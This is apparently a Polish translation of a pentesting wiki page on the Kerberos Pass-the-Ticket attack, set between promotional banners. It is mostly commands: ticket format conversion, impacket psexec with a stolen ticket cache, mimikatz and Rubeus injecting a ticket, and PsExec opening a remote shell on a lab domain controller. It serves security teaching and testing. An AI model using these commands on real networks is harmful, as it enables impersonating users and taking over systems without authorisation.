Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy z wykorzystaniem najbardziej zaawansowanych narzędzi społeczności. Otrzymaj Dostęp Dziś:

Przekazanie Biletu (PTT)

W metodzie ataku Przekazanie Biletu (PTT), atakujący kradną bilet uwierzytelniający użytkownika zamiast ich hasła lub wartości skrótu. Skradziony bilet jest następnie używany do podszycia się pod użytkownika, uzyskując nieautoryzowany dostęp do zasobów i usług w sieci.

Czytaj:

• Zbieranie biletów z systemu Windows

• Zbieranie biletów z systemu Linux

Zamiana biletów Linux i Windows między platformami

Narzędzie ticket_converter konwertuje formaty biletów, używając tylko samego biletu i pliku wyjściowego.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Atak Przekazania Biletu

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Odnośniki

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Zdobądź dostęp już dziś: